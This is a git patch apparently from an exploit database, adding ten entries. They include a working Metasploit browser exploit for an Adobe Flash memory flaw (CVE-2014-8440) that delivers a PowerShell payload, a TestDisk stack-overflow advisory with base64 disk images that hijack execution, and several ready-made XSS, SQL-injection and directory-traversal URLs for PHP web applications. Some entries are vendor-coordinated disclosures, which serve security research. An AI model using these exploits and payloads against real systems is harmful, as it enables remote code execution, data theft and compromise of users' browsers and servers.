From 3ca5bb5bfcab84ccd290b18c9f085fd215d8d171 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 2 May 2015 05:02:10 +0000 Subject: [PATCH] DB: 2015-05-02 10 new exploits --- files.csv | 10 ++ platforms/hardware/remote/36877.html | 16 +++ platforms/multiple/dos/36881.txt | 141 +++++++++++++++++++++++++++ platforms/php/webapps/36873.txt | 9 ++ platforms/php/webapps/36874.txt | 15 +++ platforms/php/webapps/36875.txt | 13 +++ platforms/php/webapps/36876.txt | 9 ++ platforms/php/webapps/36878.txt | 9 ++ platforms/php/webapps/36882.txt | 9 ++ platforms/php/webapps/36883.txt | 13 +++ platforms/windows/remote/36880.rb | 108 ++++++++++++++++++++ 11 files changed, 352 insertions(+) create mode 100755 platforms/hardware/remote/36877.html create mode 100755 platforms/multiple/dos/36881.txt create mode 100755 platforms/php/webapps/36873.txt create mode 100755 platforms/php/webapps/36874.txt create mode 100755 platforms/php/webapps/36875.txt create mode 100755 platforms/php/webapps/36876.txt create mode 100755 platforms/php/webapps/36878.txt create mode 100755 platforms/php/webapps/36882.txt create mode 100755 platforms/php/webapps/36883.txt create mode 100755 platforms/windows/remote/36880.rb diff --git a/files.csv b/files.csv index 60f2fbc7d..c3fc2f666 100755 --- a/files.csv +++ b/files.csv @@ -33265,3 +33265,13 @@ id,file,description,date,author,platform,type,port 36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router Multiple HTTP Header Fields Denial Of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0 36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 'SELECT' Statement 'WHERE' Condition Denial of Service Vulnerability",2012-02-09,IBM,multiple,dos,0 36870,platforms/php/webapps/36870.txt,"ContentLion Alpha 1.3 'login.php' Cross Site Scripting Vulnerability",2012-02-22,"Stefan Schurtz",php,webapps,0 +36873,platforms/php/webapps/36873.txt,"Dolibarr 3.2 Alpha Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",php,webapps,0 +36874,platforms/php/webapps/36874.txt,"Chyrp 2.1.1 'ajax.php' HTML Injection Vulnerability",2012-02-22,"High-Tech Bridge SA",php,webapps,0 +36875,platforms/php/webapps/36875.txt,"Chyrp 2.1.2 includes/error.php body Parameter XSS",2012-02-22,"High-Tech Bridge SA",php,webapps,0 +36876,platforms/php/webapps/36876.txt,"Oxwall 1.1.1 'plugin' Parameter Cross Site Scripting Vulnerability",2012-02-22,Ariko-Security,php,webapps,0 +36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery Vulnerability",2012-02-23,"Rigan Iimrigan",hardware,remote,0 +36878,platforms/php/webapps/36878.txt,"Mobile Mp3 Search Script 2.0 'dl.php' HTTP Response Splitting Vulnerability",2012-02-23,"Corrado Liotta",php,webapps,0 +36880,platforms/windows/remote/36880.rb,"Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory",2015-05-01,metasploit,windows,remote,0 +36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0 +36882,platforms/php/webapps/36882.txt,"MyJobList 0.1.3 'eid' Parameter SQL Injection Vulnerability",2012-02-26,"Red Security TEAM",php,webapps,0 +36883,platforms/php/webapps/36883.txt,"Webglimpse 2.x Multiple Cross Site Scripting Vulnerabilities",2012-02-26,MustLive,php,webapps,0 diff --git a/platforms/hardware/remote/36877.html b/platforms/hardware/remote/36877.html new file mode 100755 index 000000000..9984c6702 --- /dev/null +++ b/platforms/hardware/remote/36877.html @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/52134/info + +The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability. + +Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible. + +This issue affects D-Link DCS-900, DCS-2000, and DCS-5300. + + + +
+ + +
+ + \ No newline at end of file diff --git a/platforms/multiple/dos/36881.txt b/platforms/multiple/dos/36881.txt new file mode 100755 index 000000000..1a19d155a --- /dev/null +++ b/platforms/multiple/dos/36881.txt @@ -0,0 +1,141 @@ +( , ) (, + . '.' ) ('. ', + ). , ('. ( ) ( + (_,) .'), ) _ _, + / _____/ / _ \ ____ ____ _____ + \____ \==/ /_\ \ _/ ___\/ _ \ / \ + / \/ | \\ \__( <_> ) Y Y \ +/______ /\___|__ / \___ >____/|__|_| / + \/ \/.-. \/ \/:wq + (x.0) + '=.|w|.=' + _=''"''=. + + presents.. + +TestDisk 6.14 Check_OS2MB Stack Buffer Overflow +Affected versions: TestDisk 6.14 - Linux, Windows and Mac OSX + +PDF: +http://www.security-assessment.com/files/documents/advisory/Testdisk%20Check_OS2MB%20Stack%20Buffer%20Overflow%20-%20Release.pdf + ++-----------+ +|Description| ++-----------+ +This document details a stack based buffer overflow vulnerability within TestDisk 6.14. A buffer overflow is triggered +within the software when a malicious disk image is attempted to be recovered. This may be leveraged by an +attacker to crash TestDisk and gain control of program execution. An attacker would have to coerce the victim to run +TestDisk against their malicious image. + ++------------+ +|Exploitation| ++------------+ +The check_OS2MB method (fat.c, line 862) is vulnerable to a stack based buffer overflow. This is due to the 512 +byte buffer 'buffer' (defined in fat.c, check_OS2MB method, line 864) being overflowed by a subsequent memcpy +call in the cache_pread_aux method (hdcache.c, line 109). The third argument to the memcpy call (defining the +amount of data to be copied) is controlled by the attacker, this is set in a header in the test case (offset 0xC in the +below testcase, set to 2048, or 0x0800). + +The following GDB output shows the vulnerable memcpy call and the attacker controlled size argument (0x00000800): + +Breakpoint 1, 0x0804e5c2 in cache_pread_aux (disk_car=0x80c13b0, buffer=0xbffff0f0, count=2048, offset=0, read_ahead=0) at hdcache.c:109 +109 memcpy(buffer, cache->buffer + offset - cache->cache_offset, count); +(gdb) x/i $eip +=> 0x804e5c2 : call 0x80499f0 +(gdb) x/3x $esp +0xbffff010: 0xbffff0f0 0x080c3000 0x00000800 + +The following base64 data contains the test case which results in EIP control, in this case EIP being set to +BEE5BEE5. The value EIP is overwritten with is at 0x20c + +6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU +ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg +ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5 +IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW +1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA +AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA +AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA +AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA +AAAAAAAAKY9iYu3lvuW+NAsGCA0K + +--[ Linux +Note that in the provided test case, 4 bytes at 0x210 have been set to a valid address within the TEXT segment of +the TestDisk ELF file. This is due to GCC 4.7.2 compiling the Check_OS2MB method with the following assembly +code: + + 0x08060a8d <+71>: call *%ecx + 0x08060a8f <+73>: mov %eax,%edx + 0x08060a91 <+75>: mov 0x8(%ebp),%eax + 0x08060a94 <+78>: mov 0x194(%eax),%eax + 0x08060a9a <+84>: cmp %eax,%edx + 0x08060a9c <+86>: je 0x8060ac5 + +The instruction 'mov 0x8(%ebp), %eax' (0x08060a91) moves an attacker controlled portion of memory into the EAX +register and subsequently tries to read from that address ('mov 0x194(%eax)'). Thus, this has to be set to a +legitimate address, otherwise TestDisk performs an out-of-bounds memory read before returning from the +check_OS2MB method. + +As long as EDX and EAX do not match, the check_OS2MB method calls screen_buffer_add and log_redirect, then +jumps to the end of the check_OS2MB method, successfully exploiting stack overflow and gaining EIP control. +The precompiled version of TestDisk has been compiled with a stack protector. In order to exploit the precompiled +version, an attacker would have to find a way to bypass GCC’s '-fstack-protector' functionality + +--[ Windows +The provided test case results in EIP being overwritten with 0xBEE5BEE5 in the precompiled version of TestDisk. +This was tested on Windows 7 and 8.1. + +--[ Mac OSX +An attacker can also gain EIP control on the Mac OSX version of TestDisk 6.14, however the original test case +needs to be padded. The value EIP is overwritten with is at 0x21C in the OSX test case. The base64 of the OSX crash +test case is below. As in the above examples, EIP is overwritten with 0xBEE5BEE5. + +6zyQbWtkb3dmcwAACASOAAEAAIAQ+AEAAQABAAAAAOs8kG1rZAApj2Ji7SAgICAgICAgICAgRkFU +ICAgICAgIEZBVDEyICAgDh++W3ysIsB0C/Ay5M0ezRnr/lRoaXMgaXMgbm90IGEgYm9vdGFibGUg +ZGlzay4gIFBsZWFzZSBpbnNlcnQgYSBib290YWJsZSBmbG9wcHkgYW5kDQpwcmVzcyBhbnkga2V5 +IHRvIHRyeSBhZ2FpbiAuLi5ADQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAA7v//f/8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADW1tbW1tbW1tbW1tbW1tbW +1tbW1tbW1tbW1tbW1tYAAAAAAAD+4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAA +AAAAAAAAAAAAAAD/D//pAAAA5gBAAAAAAAAAAB4AAAAAAAAAAAAAAPQAAAAAAOT98v//AAAAAAAA +AAAAEAD/AAAAAAAAAAAAAAAAAAAAgAAAAAUE/wAAAAAAAAAA7fcAAACAAAAAAAAAAAAABQAAAAAA +AAAAIwAAAACAAP/zAAAAAAQAAAAAAAAAAAAAAP8AAPj/ABcAAAAAAJaFhYWA/wAAAAAAAAAAVaoA +AAAAAAAAKY9iYu0AAAAAAAAAAAAAAAAAAAAA5b7lvg== + ++----------+ +| Solution | ++----------+ +Upgrade to TestDisk 7.0 or newer. + ++-------------------+ +|Disclosure Timeline| ++-------------------+ +9/04/2015 – Advisory sent to Christophe Grenier. +9/04/2015 – Response from Christophe Grenier advising that a fix is ready for the +development version. Christophe advised a new stable version will be available in 2 weeks. +18/04/2015 – TestDisk 7.0 Released. +30/04/2015 – Release of this document. + ++-----------------------------+ +|About Security-Assessment.com| ++-----------------------------+ + +Security-Assessment.com is Australasia's leading team of Information +Security consultants specialising in providing high quality Information +Security services to clients throughout the Asia Pacific region. Our +clients include some of the largest globally recognised companies in +areas such as finance, telecommunications, broadcasting, legal and +government. Our aim is to provide the very best independent advice and +a high level of technical expertise while creating long and lasting +professional relationships with our clients. Security-Assessment.com +is committed to security research and development, and its team continues +to identify and responsibly publish vulnerabilities in public and +private software vendor's products. Members of the +Security-Assessment.com R&D team are globally recognised through their +release of whitepapers and presentations related to new security research. + +For further information on this issue or any of our service offerings, +contact us: + +Web www.security-assessment.com +Email info () security-assessment com +Phone +64 4 470 1650 \ No newline at end of file diff --git a/platforms/php/webapps/36873.txt b/platforms/php/webapps/36873.txt new file mode 100755 index 000000000..c19bb8454 --- /dev/null +++ b/platforms/php/webapps/36873.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52113/info + +Dolibarr is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks. + +Dolibarr 3.2.0 Alpha is vulnerable; other versions may also be affected. + +http://www.example.com/document.php?modulepart=project&file=../[FILE INCLUDE VULNERABILITY!] \ No newline at end of file diff --git a/platforms/php/webapps/36874.txt b/platforms/php/webapps/36874.txt new file mode 100755 index 000000000..ef8c9c4b0 --- /dev/null +++ b/platforms/php/webapps/36874.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/52115/info + +Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. + +Chyrp 2.1.1 is vulnerable; other versions may also be affected. + +
+ + + + + +
diff --git a/platforms/php/webapps/36875.txt b/platforms/php/webapps/36875.txt new file mode 100755 index 000000000..c58b32e60 --- /dev/null +++ b/platforms/php/webapps/36875.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52117/info + +Chyrp is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. + +Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. + +Chyrp 2.1.2 is vulnerable; other versions may also be affected. + +
+ + + +
diff --git a/platforms/php/webapps/36876.txt b/platforms/php/webapps/36876.txt new file mode 100755 index 000000000..c06dc56ee --- /dev/null +++ b/platforms/php/webapps/36876.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52125/info + +Oxwall is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Oxwall 1.1.1 and prior versions are vulnerable; other versions may also be affected. + +http://www.example.com/ow_updates/?plugin=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28982087%29%3C%2fScRiPt%3E \ No newline at end of file diff --git a/platforms/php/webapps/36878.txt b/platforms/php/webapps/36878.txt new file mode 100755 index 000000000..91664dcee --- /dev/null +++ b/platforms/php/webapps/36878.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52136/info + +Mobile Mp3 Search Script is prone to an HTTP-response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. + +Mobile Mp3 Search Script 2.0 is vulnerable; other versions may also be affected + +http://www.example.com/dl.php?url=http://www.google.it \ No newline at end of file diff --git a/platforms/php/webapps/36882.txt b/platforms/php/webapps/36882.txt new file mode 100755 index 000000000..6966b08d0 --- /dev/null +++ b/platforms/php/webapps/36882.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52168/info + +MyJobList is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +MyJobList 0.1.3 is vulnerable; other versions may also be affected. + +http://www.example.com/?loc=profile&eid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36883.txt b/platforms/php/webapps/36883.txt new file mode 100755 index 000000000..85b2b5c2e --- /dev/null +++ b/platforms/php/webapps/36883.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/52170/info + +Webglimpse is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible. + +Webglimpse versions 2.18.8 and prior are affected. + +http://www.example.com/wgarcmin.cgi?URL2FIL=URL+2+File+--%3E&URL=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T + +http://www.example.com/wgarcmin.cgi?FIL2URL=%3C--+File+2+URL&FILE=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T + +http://www.example.com/wgarcmin.cgi?DOMAIN=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NEXTPAGE=T \ No newline at end of file diff --git a/platforms/windows/remote/36880.rb b/platforms/windows/remote/36880.rb new file mode 100755 index 000000000..cbbb8e621 --- /dev/null +++ b/platforms/windows/remote/36880.rb @@ -0,0 +1,108 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory', + 'Description' => %q{ + This module exploits an unintialized memory vulnerability in Adobe Flash Player. The + vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, which fails + to initialize allocated memory. When using a correct memory layout this vulnerability + leads to a ByteArray object corruption, which can be abused to access and corrupt memory. + This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with + Flash 15.0.0.189. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicolas Joly', # Vulnerability discovery + 'Unknown', # Exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2014-8440'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-24.html'], + ['URL', 'http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html'], + ['URL', 'http://www.verisigninc.com/en_US/cyber-security/security-intelligence/vulnerability-reports/articles/index.xhtml?id=1081'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^15\./ && ver <= '15.0.0.189' }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Nov 11 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-8440', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end